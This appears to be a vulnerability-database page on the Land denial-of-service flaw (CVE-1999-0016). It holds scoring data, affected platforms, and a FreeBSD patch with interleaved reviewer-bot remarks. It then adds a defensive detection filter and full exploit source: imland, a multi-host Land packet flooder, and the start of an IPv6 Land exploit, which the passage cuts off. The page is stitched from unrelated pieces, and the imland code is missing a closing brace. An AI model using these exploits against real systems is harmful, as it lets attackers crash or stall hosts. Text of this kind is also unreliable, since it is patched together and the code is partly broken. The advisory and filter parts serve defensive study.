CVE-1999-0016
CVSS 5.0
Published: 1997-12-01 00:00:00
Revised: 2008-09-09 08:33:32
NMCOES

[Original] Land IP denial of service.


[CNNVD] Multiple vendors' TCP/IP implementations fail to handle packets with identical source and destination IP addresses, denial of service vulnerability (CNNVD-199712-002)

        The TCP/IP protocol stack, implemented by most operating systems, is the most widely used protocol suite for Internet connectivity.
        Early BSD-derived systems (Linux excepted) and Windows have a flaw in their TCP/IP stack implementation that a remote attacker can use to mount a denial-of-service attack against a server.
        Sending a SYN packet whose source address equals its destination address and whose source port equals its destination port to a vulnerable host is the well-known Land attack. Because of the implementation flaw, the target's handling of this malformed packet can go wrong. Systems react differently: many older UNIX-like systems crash, while on NT CPU usage climbs to nearly 100% (for roughly five minutes).
        Information on this vulnerability can be found in newsgroups and mailing lists by searching for "Land denial of service" or "Land Attack".

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_95          Microsoft Windows 95
cpe:/o:hp:hp-ux:10.24                HP HP-UX 10.24
cpe:/o:netbsd:netbsd:1.1             NetBSD 1.1
cpe:/o:hp:hp-ux:11.00                HP-UX 11.00
cpe:/o:netbsd:netbsd:1.0             NetBSD 1.0
cpe:/a:microsoft:winsock:2.0         Microsoft WinSock 2.0
cpe:/o:hp:hp-ux:10.16                HP HP-UX 10.16
cpe:/o:hp:hp-ux:10.10                HP HP-UX 10.10
cpe:/o:hp:hp-ux:9.07                 HP HP-UX 9.7
cpe:/a:gnu:inet:5.01
cpe:/o:hp:hp-ux:9.05                 HP HP-UX 9.05
cpe:/o:sun:sunos:4.1.3u1             Sun SunOS 4.1.3u1
cpe:/o:cisco:ios:7000
cpe:/o:hp:hp-ux:10.30                HP HP-UX 10.30
cpe:/o:hp:hp-ux:9.00                 HP HP-UX 9.0
cpe:/o:hp:hp-ux:9.04                 HP HP-UX 9.4
cpe:/o:hp:hp-ux:9.01                 HP HP-UX 9.01
cpe:/o:sun:sunos:4.1.4               Sun SunOS 4.1.4
cpe:/o:microsoft:windows_nt:4.0      Microsoft Windows NT 4.0
cpe:/o:hp:hp-ux:9.03                 HP HP-UX 9.3
cpe:/o:hp:hp-ux:10.00                HP HP-UX 10.00
cpe:/o:hp:hp-ux:10.20                HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01                HP HP-UX 10.01

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5835    Multiple OS TCP/IP DoS Vulnerabilities
oval:org.mitre.oval:def:5727    A TCP SYN packet with target host's address as both source and destination can cause system hangs.
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0016
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0016
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199712-002
(official data source) CNNVD

- Other links and resources

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9801-076
(UNKNOWN)  HP  HPSBUX9801-076

- Vulnerability information

Multiple vendors' TCP/IP implementations fail to handle packets with identical source and destination IP addresses, denial of service vulnerability
Medium  Unknown
1997-12-01 00:00:00 2006-11-16 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        FreeBSD
        -------
        FreeBSD has released security advisory SA-98:01 and a corresponding patch for this issue:
        SA-98:01: LAND attack can cause harm to running FreeBSD systems
        Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/SA-98:01.asc
        Patch download:
        Apply the enclosed patch. There are two patches, one for FreeBSD
         -current, and another for FreeBSD 2.2-stable.
         patch for -current prior to Jan 21, 1998. Found in land-current.
         Index: tcp_input.c
         ===================================================================
         RCS file: /home/imp/FreeBSD/CVS/src/sys/netinet/tcp_input.c,v
         retrieving revision 1.67
         retrieving revision 1.68
         diff -u -r1.67 -r1.68
         --- tcp_input.c 1997/12/19 23:46:15 1.67
         +++ tcp_input.c 1998/01/21 02:05:59 1.68
         @@ -626,6 +613,7 @@
         * If the state is LISTEN then ignore segment if it contains an RST.
         * If the segment contains an ACK then it is bad and send a RST.
         * If it does not contain a SYN then it is not interesting; drop it.
         + * If it is from this socket, drop it, it must be forged.
         * Don't bother responding if the destination was a broadcast.
         * Otherwise initialize tp->rcv_nxt, and tp->irs, select an initial
         * tp->iss, and send a segment:
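Review bot: the added comment "If it is from this socket, drop it, it must be forged." describes the wrong thing: the test introduced in the next hunk compares the segment's own source and destination address and port, and says nothing about the listening socket. State the actual condition ("If the segment's source address/port equal its destination address/port it is forged (Land); drop it silently") and record why the path is `drop` rather than `dropwithreset`: a RST in reply would be addressed to this host itself.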
         @@ -644,6 +632,9 @@
         goto dropwithreset;
         if ((tiflags & TH_SYN) == 0)
         goto drop;
         + if ((ti->ti_dport == ti->ti_sport) &&
         + (ti->ti_dst.s_addr == ti->ti_src.s_addr))
         + goto drop;
         /*
         * RFC1122 4.2.3.10, p. 104: discard bcast/mcast SYN
         * in_broadcast() should never return true on a received
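Review bot: the condition `(ti->ti_dport == ti->ti_sport) && (ti->ti_dst.s_addr == ti->ti_src.s_addr)` only matches a segment whose source is literally its destination; on a multi-homed host a SYN spoofed from one of the box's other addresses passes this line and still drives the same self-connect path, so the SYN_RECEIVED handling added further down, not this check, has to be the fix that holds. Also consider counting the drop (the later hunk bumps `tcpstat.tcps_badsyn++` for the SYN/ACK case); a silent `goto drop` leaves an operator with nothing in the TCP statistics to show the attack happened.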
         @@ -762,6 +753,23 @@
         }
        
         /*
         + * If the state is SYN_RECEIVED:
         + * if seg contains SYN/ACK, send a RST.
         + * if seg contains an ACK, but not for our SYN/ACK, send a RST.
         + */
         + case TCPS_SYN_RECEIVED:
         + if (tiflags & TH_ACK) {
         + if (tiflags & TH_SYN) {
         + tcpstat.tcps_badsyn++;
         + goto dropwithreset;
         + }
         + if (SEQ_LEQ(ti->ti_ack, tp->snd_una) ||
         + SEQ_GT(ti->ti_ack, tp->snd_max))
         + goto dropwithreset;
         + }
         + break;
         +
         + /*
         * If the state is SYN_SENT:
         * if seg contains an ACK, but not for our SYN, drop the input.
         * if seg contains a RST, then drop the connection.
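Review bot: `tcpstat.tcps_badsyn++` is incremented only on the SYN|ACK branch; the bad-ACK `goto dropwithreset` two lines below goes uncounted, so either count both rejections or neither to keep the statistic meaningful. The comment above the new case should also say that a segment without TH_ACK (a retransmitted SYN, for instance) falls out of the `break;` into the existing processing unchanged, since that is the only reason the body is wrapped in `if (tiflags & TH_ACK)`. Note too that the new lower bound `SEQ_LEQ(ti->ti_ack, tp->snd_una)` is stricter than the `SEQ_GT(tp->snd_una, ti->ti_ack)` it supersedes in the later hunk: an ACK equal to snd_una, which acknowledges nothing of our SYN, now draws a RST instead of completing the handshake; worth a sentence in the comment so nobody "fixes" it back.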
         @@ -1176,14 +1184,11 @@
         switch (tp->t_state) {
        
         /*
         - * In SYN_RECEIVED state if the ack ACKs our SYN then enter
         - * ESTABLISHED state and continue processing, otherwise
         - * send an RST.
         + * In SYN_RECEIVED state, the ack ACKs our SYN, so enter
         + * ESTABLISHED state and continue processing.
         + * The ACK was checked above.
         */
         case TCPS_SYN_RECEIVED:
         - if (SEQ_GT(tp->snd_una, ti->ti_ack) ||
         - SEQ_GT(ti->ti_ack, tp->snd_max))
         - goto dropwithreset;
        
         tcpstat.tcps_connects++;
         soisconnected(so);
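Review bot: with the two `SEQ_GT` guards removed, this switch relies on every SYN_RECEIVED segment having passed through the check added in the earlier state switch; the replacement comment "The ACK was checked above." should name that location so the two switches stay in sync when either is edited. Re-read the `tcpstat.tcps_connects++` / `soisconnected(so)` path with the tightened bound in mind: an ACK equal to snd_una is now rejected earlier with a RST rather than reaching this point, which is the intended behaviour change and should be stated as such.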
         patch for 2.2.5 and 2.2.5-stable before Jan 30, 1998 found in land-22
         Index: tcp_input.c
         ===================================================================
         RCS file: /home/imp/FreeBSD/CVS/src/sys/netinet/tcp_input.c,v
         retrieving revision 1.54.2.6
         retrieving revision 1.54.2.7
         diff -u -r1.54.2.6 -r1.54.2.7
         --- tcp_input.c 1997/11/20 21:45:34

- Vulnerability information (20810)

FreeBSD 2.x, HP-UX 9/10/11, kernel 2.0.3, Windows NT 4.0/Server 2003, NetBSD 1 loopback (land.c) DoS (1) (EDBID:20810)
multiple remote
1997-11-20 Verified
0 m3lt
N/A
source: http://www.securityfocus.com/bid/2666/info

A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination address and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.

It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.

**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
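The condition described above (a SYN whose source address:port equals its destination address:port) and the note that a stack validating checksums only reacts to a correctly checksummed segment, written out as a stand-alone filter in C. This is an added example, not code from this page, from the exploit authors or from any vendor: land_check() applies the same test the FreeBSD SA-98:01 patch adds to tcp_input(), but over raw packet bytes as a packet filter or IDS would see them, and goes slightly beyond the text by also catching the SYN|PSH variant that latierra sends by default and by rejecting truncated or mis-checksummed segments. The 192.0.2.10 and 198.51.100.7 addresses and the sample segments are constructed for the example, not captured traffic.

```c
/* Stack-side Land filter over a raw IPv4 packet, with a checksum-correct
 * builder used to construct the sample segments (constructed, not captured). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PROTO_TCP 6
#define FLAG_SYN  0x02
#define FLAG_RST  0x04
#define FLAG_PSH  0x08
#define FLAG_ACK  0x10

enum land_verdict { LAND_BAD_CKSUM = -3, LAND_TRUNCATED = -2, LAND_NOT_TCP = -1,
                    LAND_NO = 0, LAND_YES = 1 };

/* RFC 1071: accumulate big-endian 16-bit words; a trailing odd byte is the high byte. */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc)
{
    for (; n > 1; n -= 2, p += 2) acc += ((uint32_t)p[0] << 8) | p[1];
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}

/* Fold every carry back in (not just one), then complement. */
static uint16_t fold(uint32_t s)
{
    while (s >> 16) s = (s & 0xffff) + (s >> 16);
    return (uint16_t)~s;
}

/* Land condition: a SYN (no ACK, no RST) whose source address:port equals its
 * destination address:port, the test SA-98:01 adds to tcp_input().  Checksums
 * are verified first because a stack that validates them (the Windows 2003 /
 * XP SP2 note above) never acts on a segment that fails them. */
int land_check(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return LAND_TRUNCATED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || tot > len || tot < ihl + 20) return LAND_TRUNCATED;
    if (pkt[9] != PROTO_TCP) return LAND_NOT_TCP;
    if (fold(sum16(pkt, ihl, 0)) != 0) return LAND_BAD_CKSUM;        /* IP header */

    const uint8_t *tcp = pkt + ihl;
    size_t tcplen = tot - ihl;
    uint32_t pseudo = sum16(pkt + 12, 8, 0) + PROTO_TCP + (uint32_t)tcplen;
    if (fold(sum16(tcp, tcplen, pseudo)) != 0) return LAND_BAD_CKSUM; /* TCP */

    uint8_t flags = tcp[13];
    int syn_open  = (flags & FLAG_SYN) && !(flags & (FLAG_ACK | FLAG_RST));
    int same_addr = memcmp(pkt + 12, pkt + 16, 4) == 0;   /* src == dst */
    int same_port = memcmp(tcp, tcp + 2, 2) == 0;         /* sport == dport */
    return (syn_open && same_addr && same_port) ? LAND_YES : LAND_NO;
}

/* Write a 40-byte IPv4+TCP header pair with valid checksums into out. */
size_t build_tcp_syn(uint8_t out[40], const uint8_t src[4], const uint8_t dst[4],
                     uint16_t sport, uint16_t dport, uint8_t flags)
{
    memset(out, 0, 40);
    out[0] = 0x45; out[3] = 40; out[6] = 0x40; out[8] = 255; out[9] = PROTO_TCP;
    memcpy(out + 12, src, 4);
    memcpy(out + 16, dst, 4);
    uint16_t ipck = fold(sum16(out, 20, 0));
    out[10] = ipck >> 8; out[11] = ipck & 0xff;

    uint8_t *tcp = out + 20;
    tcp[0] = sport >> 8; tcp[1] = sport & 0xff;
    tcp[2] = dport >> 8; tcp[3] = dport & 0xff;
    tcp[6] = 0x01; tcp[7] = 0xd1;                 /* seq 0x1d1, as imland uses */
    tcp[12] = 0x50;                               /* data offset 5 words, no options */
    tcp[13] = flags;
    tcp[14] = 0x02;                               /* window 512 */
    uint16_t tck = fold(sum16(tcp, 20, sum16(out + 12, 8, 0) + PROTO_TCP + 20));
    tcp[16] = tck >> 8; tcp[17] = tck & 0xff;
    return 40;
}

/* Constructed samples: victim 192.0.2.10:139, unrelated peer 198.51.100.7 (TEST-NET ranges). */
static const uint8_t VICTIM[4] = {192, 0, 2, 10};
static const uint8_t PEER[4]   = {198, 51, 100, 7};

int sample_land_verdict(void)      /* the classic land.c packet */
{ uint8_t p[40]; build_tcp_syn(p, VICTIM, VICTIM, 139, 139, FLAG_SYN); return land_check(p, 40); }
int sample_land_push_verdict(void) /* latierra's default SYN|PSH flags */
{ uint8_t p[40]; build_tcp_syn(p, VICTIM, VICTIM, 139, 139, FLAG_SYN | FLAG_PSH); return land_check(p, 40); }
int sample_benign_verdict(void)    /* ordinary SYN from another host */
{ uint8_t p[40]; build_tcp_syn(p, PEER, VICTIM, 40000, 139, FLAG_SYN); return land_check(p, 40); }
int sample_badsum_verdict(void)    /* Land SYN whose TCP checksum was damaged in flight */
{ uint8_t p[40]; build_tcp_syn(p, VICTIM, VICTIM, 139, 139, FLAG_SYN); p[36] ^= 0x01; return land_check(p, 40); }
int sample_truncated_verdict(void) /* IP total length claims more bytes than were received */
{ uint8_t p[40]; build_tcp_syn(p, VICTIM, VICTIM, 139, 139, FLAG_SYN); return land_check(p, 30); }

int main(void)
{
    printf("land=%d land+psh=%d benign=%d badsum=%d truncated=%d\n",
           sample_land_verdict(), sample_land_push_verdict(), sample_benign_verdict(),
           sample_badsum_verdict(), sample_truncated_verdict());
    return 0;
}
```

Build with `cc -std=c99 -o land_check land_check.c`. The checksum routine (sum, fold every carry, complement) is deliberately the one a stack uses for verification: the same bytes that make the sample trigger a checksum-validating host are what a filter must see as valid before the src/dst comparison means anything, so ordering the checks this way avoids alerting on garbage the target would have discarded anyway.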

/*
 * imland - improved multiple land
 *
 * A good spanking session requires several good, hard slaps.
 *
 * This program lands multiple land attacks on multiple hosts as a
 * proof of concept of the oldly discovered but newly resurfaced
 * M$ `land' attack vulnerability. It was written without ill intent to
 * test a large range of servers for vulnerabilities in one go.
 *
 * If the targeted machines freeze up for 5-30 seconds for each packet,
 * that means they are vulnerable.
 *
 * Disclaimer:
 * This program was written without ill intent. It was designed to test
 * and prove the effects of the LAND attack on multiple hosts at once.
 * I am in no way responsible for what you do with this piece of code.
 *
 * Please use it responsibly to test your own servers only.
 *
 */

#define _BSD_SOURCE
#define _DEFAULT_SOURCE
#define __FAVOR_BSD          /* BSD-style struct tcphdr field names (th_sport, ...) on glibc */

#include <stdio.h>
#include <ctype.h>
#include <string.h>          /* memset, memcpy, strchr, strlen, strerror */
#include <sys/socket.h>
#include <sys/select.h>      /* select(), used by u_sleep() */
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>       /* inet_ntoa, inet_aton */
#include <stdarg.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


/* the attack packet */
struct raw_tcp_packet {
	struct ip ip;
	struct tcphdr tcp;
};

/* required to make the TCP checksum correct */
struct tcp_chksum_hdr {
	struct in_addr src;
	struct in_addr dest;
	u_char zero;
	u_char proto;
	u_short len;
	struct tcphdr tcp;
};

/* linked list with all we need, really */
typedef struct target {
	struct sockaddr_in sa;
	struct {
		struct ip ip;       /* included here so we can build them once */
		struct tcphdr tcp;  /* and thus transmit a tiny bit faster (send_land() builds its own) */
	} pkt;
	struct target *next;
} target;

/** prototypes **/
int send_land(int, struct target *);
void u_sleep(u_int);
int add_target_ip(char *, struct in_addr *, u_short);
u_int get_timevar(const char *);
int add_target(char *);
unsigned short chksum(unsigned short *, int);
void finish(int);
void crash(const char *, ...);
void usage(void);

/** external **/
extern int optind, opterr, optopt;
extern int h_errno;
extern char *optarg;
extern char *__progname;

/** global variables **/
target *list = NULL, *cursor = NULL;
int targets = 0;
int pkt_interval = 0; /* no delay by default */
int pkts = 1, pkts_sent = 0;  /* send one per host by default */
int debug = 0;
u_short defport = 139; /* default port */

/** code start **/
void crash(const char *fmt, ...)
{
	va_list ap;

	printf("%s: ", __progname);

	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);

	if(errno) printf(": %s", strerror(errno));
	puts("");

	exit(3);
}

int main(int argc, char **argv)
{
	target *host;
	int sock, foo;

	if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
		crash("socket()");

	/* -v may be repeated for more verbosity and takes no argument */
	while((foo = getopt(argc, argv, "vi:p:n:")) != -1) {
		switch(foo) {
		case 'v':
			debug++;
			break;
		case 'i':
			pkt_interval = get_timevar(optarg);
			break;
		case 'p':
			defport = (u_short)strtoul(optarg, NULL, 0);
			break;
		case 'n':
			pkts = strtoul(optarg, NULL, 0);
			if(debug) printf("Sending %d packets\n", pkts);
			break;
		default:	/* unknown option or missing argument */
			usage();
		}
	}

	argv = &argv[optind];
	while(*argv) {
		add_target(*argv);
		argv++;
	}
	
	if(!targets) usage();

	while(!pkts || pkts > pkts_sent) {
		host = list;
		while(host) {
			printf("Sending to %s:%u ... ",
				   inet_ntoa(host->sa.sin_addr),
				   host->sa.sin_port);
			foo = send_land(sock, host);
			if(foo == - 1) printf("failed - %s\n", strerror(errno));
			else printf("ok, landed %d bytes\n", foo);

			if(pkt_interval) u_sleep(pkt_interval);

			host = host->next;
		}
		pkts_sent++;
	}

	return 0;
}

/* build and send the land attack packet */
int send_land(int sock, struct target *host)
{
	struct raw_tcp_packet pkt;
	struct tcp_chksum_hdr tcc;

	memset(&pkt, 0, sizeof(pkt));
	memset(&tcc, 0, sizeof(tcc));

	/* ip header: source address == destination address */
	pkt.ip.ip_v = IPVERSION;
	pkt.ip.ip_hl = sizeof(struct ip) / 4;
	pkt.ip.ip_tos = 0;
	pkt.ip.ip_len = htons(sizeof(struct ip) + sizeof(struct tcphdr)); /* was ntohs(): same bits on little-endian hosts, htons is what is meant */
	pkt.ip.ip_off = htons(IP_DF);
	pkt.ip.ip_ttl = 0xff;
	pkt.ip.ip_p = IPPROTO_TCP;
	pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr;
	pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct ip));

	tcc.src = tcc.dest = host->sa.sin_addr;
	tcc.zero = 0;
	tcc.proto = IPPROTO_TCP;
	tcc.len = htons(sizeof(struct tcphdr));

	/* tcp header: source port == destination port, SYN only */
	tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port);
	tcc.tcp.th_seq = htonl(0x1d1);              /* 32-bit field: htonl, not htons */
	tcc.tcp.th_off = sizeof(struct tcphdr) / 4; /* header length in 32-bit words */
	tcc.tcp.th_flags = TH_SYN;
	tcc.tcp.th_win = htons(512);

	memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr));
	pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc));
	return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa,
				  sizeof(struct sockaddr_in));
}

/* calculate checksum */
u_short chksum(u_short *p, int n)
{
	register long sum = 0;

	while(n > 1) {
		sum += *p++;
		n -= 2;
	}
	/* mop up the occasional odd byte */
	if(n == 1) sum += *(u_char *)p;

	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum = sum + (sum >> 16);            /* add carry */
	return ~sum;                        /* ones-complement, truncate */
}

/* usleep() the portable way. No error checking is done,
 * so this might theoretically fail. */
void u_sleep(u_int u_sec)
{
	struct timeval to;
	fd_set readset, writeset;

	if(debug > 3) printf("sleeping for %u microseconds\n", u_sec);
	if(!u_sec) return;

	to.tv_sec = u_sec / 1000000;
	to.tv_usec = u_sec % 1000000;
	FD_ZERO(&writeset);
	FD_ZERO(&readset);
	select(0, &readset, &writeset, NULL, &to);

	return;
}

int add_target_ip(char *arg, struct in_addr *in, u_short port)
{
	struct target *host;

	/* disregard obviously stupid addresses */
	if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY)
		return -1;

	if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port);

	/* add the fresh ip */
	host = malloc(sizeof(struct target));
	if(!host) {
		crash("add_target_ip(%s, %s): malloc(%d) failed",
			  arg, inet_ntoa(*in), sizeof(struct target));
	}
	memset(host, 0, sizeof(struct target));

	/* fill out the sockaddr_in struct */
	host->sa.sin_family = AF_INET;
	host->sa.sin_addr.s_addr = in->s_addr;
	host->sa.sin_port = port ? port : defport;

	if(!list) list = host;
	else cursor->next = host;

	cursor = host;
	targets++;

	return 0;
}

/* wrapper for add_target_ip to resolve stuff as well */
int add_target(char *arg)
{
	int i;
	struct hostent *he;
	struct in_addr *in, ip;
	char *port_str;
	u_short port = 0;

	if(!arg) return -1;
	
	if((port_str = strchr(arg, ':'))) {
		*port_str = '\0';
		port_str++;
		if(*port_str) port = (u_short)strtoul(port_str, NULL, 0);
	}

	/* don't resolve if we don't have to */
	if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port);

	/* not an IP, so resolve */
	errno = 0;
	he = gethostbyname(arg);
	if(!he && h_errno == TRY_AGAIN) {
		u_sleep(500000);
		he = gethostbyname(arg);
	}

	if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno));

	/* add all the IP's as targets */
	for(i = 0; he->h_addr_list[i]; i++) {
		in = (struct in_addr *)he->h_addr_list[i];
		add_target_ip(arg, in, port);
	}

	return 0;
}

/*
 * u = micro
 * m = milli
 * s = seconds
 * return value is in microseconds
 */
u_int get_timevar(const char *str)
{
	char p, u, *ptr;
	unsigned int len;
	u_int i, d;	            /* integer and decimal, respectively */
	u_int factor = 1000;    /* default to milliseconds */

	if(!str) return 0;
	len = strlen(str);
	if(!len) return 0;

	/* unit might be given as ms|m (millisec),
	 * us|u (microsec) or just plain s, for seconds */
	u = p = '\0';
	u = str[len - 1];
	if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2];
	if(p && u == 's') u = p;
	else if(!p) p = u;
	if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p);

	if(u == 'u') factor = 1;            /* microseconds */
	else if(u == 'm') factor = 1000;	/* milliseconds */
	else if(u == 's') factor = 1000000;	/* seconds */
	if(debug > 3) printf("factor is %u\n", factor);

	i = strtoul(str, &ptr, 0);

	/* no fractional part, or microseconds (which can't be fractional) */
	if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1)
		return i * factor;

	/* fractional part: weight each decimal digit by the right power of ten,
	 * so "1.25s" is 1250000us and "0.5m" is 500us (the original handled only
	 * one digit correctly) */
	{
		u_int scale = factor / 10;
		u_int frac = 0;

		for(ptr++; isdigit((int)*ptr) && scale; ptr++, scale /= 10)
			frac += (u_int)(*ptr - '0') * scale;

		return (i * factor) + frac;
	}

void usage(void)
{
	printf("Usage: %s -i <interval> -p <port> -n <pkts> host1:port1 hostn:portn\n\n",
		   __progname);

	printf("-i sets packet interval in milliseconds.\n");
	printf("   You can specify Nus for N microseconds, or Ns for N seconds.\n");
	printf("   Default is 0, which is good for multiple hosts and one packet.\n");
	printf("   If you want to send continuously, specify 1s or more, so as to not\n");
	printf("   cause DoS due to sheer traffic volume.\n\n");
	printf("-p sets the DEFAULT port (139 if not specified)\n\n");
	printf("-n determines how many packets to send to each target. Default is 1\n\n");
	printf("host:port combinations can be given as such; 207.46.130.108:80\n");
	printf("The port part of a target definition ovverrides the defaults.\n\n");
	printf("Hostnames will be resolved, if possible.\n");

	exit(1);
}
		

- Vulnerability information (20811)

FreeBSD 2.x, HP-UX 9/10/11, kernel 2.0.3, Windows NT 4.0/Server 2003, NetBSD 1 loopback (land.c) DoS (2) (EDBID:20811)
multiple remote
1997-11-20 Verified
0 Konrad Malewski
N/A
source: http://www.securityfocus.com/bid/2666/info
 

//
// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
//
// Written by: Konrad Malewski.
//

#include <stdlib.h>
#include <stdio.h>
#include <string.h>     /* memcpy */
#include <time.h>       /* time(), used to seed rand() */
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////////////////////////////////////////////////////////////////////////
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN      0x6

typedef unsigned char  u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int   u_int32_t;
typedef unsigned __int64 u_int64_t;
/*
*  Ethernet II header
*  Static header size: 14 bytes
*/
struct libnet_ethernet_hdr
{
  u_int8_t  ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
  u_int8_t  ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
  u_int16_t ether_type;                 /* protocol */
};

struct libnet_in6_addr
{
  union
  {
    u_int8_t   __u6_addr8[16];
    u_int16_t  __u6_addr16[8];
    u_int32_t  __u6_addr32[4];
  } __u6_addr;            /* 128-bit IP6 address */
};


/*
*  IPv6 header
*  Internet Protocol, version 6
*  Static header size: 40 bytes
*/
struct libnet_ipv6_hdr
{
  u_int8_t ip_flags[4];     /* version, traffic class, flow label */
  u_int16_t ip_len;         /* total length */
  u_int8_t ip_nh;           /* next header */
  u_int8_t ip_hl;           /* hop limit */
  struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */

};

/*
*  TCP header
*  Transmission Control Protocol
*  Static header size: 20 bytes
*/
struct libnet_tcp_hdr
{
  u_int16_t th_sport;       /* source port */
  u_int16_t th_dport;       /* destination port */
  u_int32_t th_seq;          /* sequence number */
  u_int32_t th_ack;          /* acknowledgement number */
  u_int8_t th_x2:4,         /* (unused) */
th_off:4;        /* data offset */

  u_int8_t  th_flags;       /* control flags */
  u_int16_t th_win;         /* window */
  u_int16_t th_sum;         /* checksum */
  u_int16_t th_urp;         /* urgent pointer */
};

int libnet_in_cksum(u_int16_t *addr, int len)
{
  int sum;
  union
  {
    u_int16_t s;
    u_int8_t b[2];
  }pad;
  sum = 0;
  while (len > 1)
  {
    sum += *addr++;
    len -= 2;
  }
  if (len == 1)
  {
    pad.b[0] = *(u_int8_t *)addr;
    pad.b[1] = 0;
    sum += pad.s;
  }
  return (sum);
}
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))

///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;

u_char errbuf[1024];
pcap_t *pcap_handle;


void usage(char* n)
{
  pcap_if_t * alldevs,*d;
  int i=1;
  fprintf(stdout,"Usage:\n"
    "\t %s <device> <victim> <port>\n",n);

  if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
  {
    fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
    exit(EXIT_FAILURE);
  }
  printf("Avaliable adapters: \n");
  d = alldevs;
  while (d!=NULL)
  {
    printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
    d = d->next;
  }
  pcap_freealldevs (alldevs);
}
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
  if ( argc<4 )
  {
    usage(argv[0]);
    return EXIT_FAILURE;
  }

  int retVal;
  struct addrinfo hints,*addrinfo;

  ZeroMemory(&hints,sizeof(hints));

  WSADATA wsaData;
  if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
  {
    fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
    return EXIT_FAILURE;
  }
  //
  // Get MAC address of remote host (assume link local IpV6 address)
  //

  hints.ai_family = PF_INET6;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_protocol = IPPROTO_TCP;
  hints.ai_flags = AI_PASSIVE;

  retVal =  getaddrinfo(argv[2],0, &hints, &addrinfo);
  if ( retVal!=0 )
  {
    WSACleanup();
    fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
    exit(EXIT_FAILURE);
  }

  //
  // Open WinPCap adapter
  //
  if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
  {
    freeaddrinfo(addrinfo);
    WSACleanup();
    fprintf(stderr, "Error opening device: %s\n",argv[1]);
    return EXIT_FAILURE;
  }

  ZeroMemory(packet,sizeof(packet));
  struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;

